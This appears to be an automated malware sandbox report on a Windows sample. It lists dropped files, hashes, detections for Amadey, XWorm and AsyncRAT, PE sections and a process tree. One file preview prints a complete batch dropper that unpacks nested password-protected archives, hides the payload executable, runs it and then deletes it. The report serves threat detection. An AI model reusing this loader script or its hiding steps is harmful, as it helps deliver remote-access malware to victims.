                                                                                                                                                                                                                                                Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                                                                SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                                                                SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                                                                SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):314617856
                                                                                                                                                                                                                                                Entropy (8bit):0.0023406044119182
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:3F2F75FBF18F3A962480828367DA1474
                                                                                                                                                                                                                                                SHA1:E873106750C96AF2E4B514B454B26144FDCBD51B
                                                                                                                                                                                                                                                SHA-256:91143D5A391BB62354AE821F07E7B0137A17D8111D48562B4056F0FC4B8A925F
                                                                                                                                                                                                                                                SHA-512:92B85A5301C480D85C296C629F2B3D0574D1CA2C87F4CABF84216E8687B70EC3E9E29B14FEAD335FFD3C809B7ED4FFB5833C34C0F5E528FDA913B0D44C2A2F68
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.cg...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1827328
                                                                                                                                                                                                                                                Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                                SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                                SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 21:16:10 2024, mtime=Fri Dec 20 21:16:10 2024, atime=Fri Dec 20 21:16:10 2024, length=90112, window=hide
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):767
                                                                                                                                                                                                                                                Entropy (8bit):5.083752205932191
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:B8E2713C0D53255E3333DB09F89EAE38
                                                                                                                                                                                                                                                SHA1:1911639844D0B7D7843C5F40718FB169BADDF116
                                                                                                                                                                                                                                                SHA-256:77088BED4071000A8B6E4276E1632A286377A30A1E6ABE2FE0E513178D6D67F8
                                                                                                                                                                                                                                                SHA-512:049B121357277C817BBB56A8530B5C59BA722CAB8EF065BC6A0EF554610AD4591DC57322880484F993957428417B52E52D3FCCE73E50447784826914403D78C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:L..................F.... ...P.^.,S..P.^.,S..P.^.,S...`......................v.:..DG..Yr?.D..U..k0.&...&.......$..S....206,S...v.,S......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EW<2.Y...../.....................d*6.R.o.a.m.i.n.g.....b.2..`...Y.. .XClient.exe.H......Y...Y.......!.......................X.C.l.i.e.n.t...e.x.e.......\...............-.......[...........v.6......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......980108...........hT..CrF.f4... .........-...-$..hT..CrF.f4... .........-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8
                                                                                                                                                                                                                                                Entropy (8bit):2.75
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
                                                                                                                                                                                                                                                SHA1:C27C796BB3C2FAC929359563676F4BA1FFADA1F5
                                                                                                                                                                                                                                                SHA-256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
                                                                                                                                                                                                                                                SHA-512:C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.5.False
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):90112
                                                                                                                                                                                                                                                Entropy (8bit):5.956916783358023
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:07E410214A2AEB8F577E407154252F3C
                                                                                                                                                                                                                                                SHA1:697FAC558B66C0476C3F04D80764FA75EB6DE77D
                                                                                                                                                                                                                                                SHA-256:12E340E551ABBF8A61A6DD73D45C94E88AA217CEAE070BA0748360D24C706114
                                                                                                                                                                                                                                                SHA-512:470B208122D6177E4635038418E4966A63725C7F9B21B4D41F3C89B953BAE9A23E141424B358110DE3A8D1624C125224A7471BB44EF7039C313D03E844A20ECC
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg.................V..........nt... ........@.. ....................................@..................................t..O.................................................................................... ............... ..H............text...tT... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B................Pt......H.......4t..........&.....................................................(....*.r...p*. ,-..*..(....*.r!..p*. ~.H.*.s.........s.........s.........s.........*.r...p*. X...*.r...p*. `..*.r...p*. ....*.r...p*. ...*.r[..p*..((...*.r...p*. P4..*.r@..p*. ..e.*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(d...*"(....+.*"(....+.*&(F...&+.*.+5sq... .... .'..or...(,...~....-.(e...(W...~....os...&.-.*.r...p*. r.d.*.r...p*.rH..p*. y/..*.r...p*. e...*.r...p*. #,..*.r...p*. &G..*.rX..p*.
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):302
                                                                                                                                                                                                                                                Entropy (8bit):3.4151523299505486
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:6EC16A881BD2D15EC78434C67D29E6AF
                                                                                                                                                                                                                                                SHA1:55527D1D10C7D0EA988CB93CA2CA0558C875A809
                                                                                                                                                                                                                                                SHA-256:1F6794E127749D48A6E876805202A054B8698278EE366BE8CC13A5FEFD8EC513
                                                                                                                                                                                                                                                SHA-512:A81B53C46AAFE8255BA462DD6591A9B40215614401FADC97A603A5C65088D90FBCE9693ED67FC928B23652900B6341DAF80C028133DEA783312F18657E8E9D55
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....\.Wt.yB..;1pR.aF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                                Entropy (8bit):4.469353164566981
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:FD9638DEB3AE4AC7F5C687F04580C82B
                                                                                                                                                                                                                                                SHA1:9F01C5197FBB9FFF505936E85EC13B52E700F0F7
                                                                                                                                                                                                                                                SHA-256:1B0D8430F544098718E71B1796E98F40ADC5C0BE2B7662D37A239C935F3C3ADF
                                                                                                                                                                                                                                                SHA-512:7AA1AE7D2A8235DB08AA66A7DB471D182BA9F62C7BFD914A8DEBE3D813D2E29AD250AAC206B185EE1E5D8F987C9C271A0935C3804FB19A85B24A60024F2BF1DF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.S.|,S..............................................................................................................................................................................................................................................................................................................................................(j.H........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):350
                                                                                                                                                                                                                                                Entropy (8bit):5.0682682106683945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                                                                                SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                                                                                SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                                                                                SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..
                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):6.531591038682421
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                                File size:3'032'576 bytes
                                                                                                                                                                                                                                                MD5:c9624e4e0c6bbc83b57f844d1dc44102
                                                                                                                                                                                                                                                SHA1:b0f8c247986305f8f1f83ea55bb04f6c748557ce
                                                                                                                                                                                                                                                SHA256:a7a661cf43d7129a809901c641998089aff10f97a09bbdf5874ba16c01db5dfb
                                                                                                                                                                                                                                                SHA512:0417b2186a7f284a79016bd2cc473768293f2c262400439dac659b0a46cff82f72018f6fbbb3ba41b6d76eeff1f96110f8cd5c4739989dafb17942dd0e9a0d23
                                                                                                                                                                                                                                                SSDEEP:49152:jyKdaGFwF6TL+v1ndNBCT8HlTxD/S8jeHAleOOOOOOOOOOOOOOOOOOOOOOOOOOOU:XdzFwFYLGbNBCT6lV0ll
                                                                                                                                                                                                                                                TLSH:00E53CB2760572CBD48A277C9427CD8259AD07FA4B2008E79C69B47F7E67CC215B6C2C
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                Entrypoint:0x71f000
                                                                                                                                                                                                                                                Entrypoint Section:.taggant
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                jmp 00007F08EC8BDFDAh
                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x31d60c0x10hjveylar
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x31d5bc0x18hjveylar
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                0x10000x680000x2de00200bd713021f87aed7d722ee307a8b81False0.9977967472752044data7.979751074581925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .rsrc0x690000x5d40x40034477384d5c4e9f8bd299d33b1f85f78False0.708984375data5.793703528132061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                hjveylar0x6b0000x2b30000x2b2c00ea6d30d1b66c39a651104fab24bb2b58unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                feaxxngf0x31e0000x10000x4009d84b2ef6a8ecb881211d35a3793212bFalse0.80859375data6.282338545259295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .taggant0x31f0000x30000x22002ae7f7bef083271ccb40b2042f2a923fFalse0.06192555147058824DOS executable (COM)0.7328949075747029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                RT_MANIFEST0x31d61c0x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                                                RT_MANIFEST0x31da000x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                kernel32.dlllstrcpy
                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                EnglishUnited States
                                                                                                                                                                                                                                                Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                Start time:17:12:16
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                Imagebase:0xe70000
                                                                                                                                                                                                                                                File size:3'032'576 bytes
                                                                                                                                                                                                                                                MD5 hash:C9624E4E0C6BBC83B57F844D1DC44102
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.2154211467.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:17:12:19
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                Imagebase:0x470000
                                                                                                                                                                                                                                                File size:3'032'576 bytes
                                                                                                                                                                                                                                                MD5 hash:C9624E4E0C6BBC83B57F844D1DC44102
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2182621065.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                Start time:17:13:00
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Imagebase:0x470000
                                                                                                                                                                                                                                                File size:3'032'576 bytes
                                                                                                                                                                                                                                                MD5 hash:C9624E4E0C6BBC83B57F844D1DC44102
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.2589474879.0000000005250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                Start time:17:13:14
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe"
                                                                                                                                                                                                                                                Imagebase:0x7ff60a9e0000
                                                                                                                                                                                                                                                File size:2'338'304 bytes
                                                                                                                                                                                                                                                MD5 hash:F16E098C7EFAD8AB0B6E62C428E7E649
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                Start time:17:13:21
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe"
                                                                                                                                                                                                                                                Imagebase:0x7ff702630000
                                                                                                                                                                                                                                                File size:1'101'736 bytes
                                                                                                                                                                                                                                                MD5 hash:A732362B415CD62F07D30DB89E742C85
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
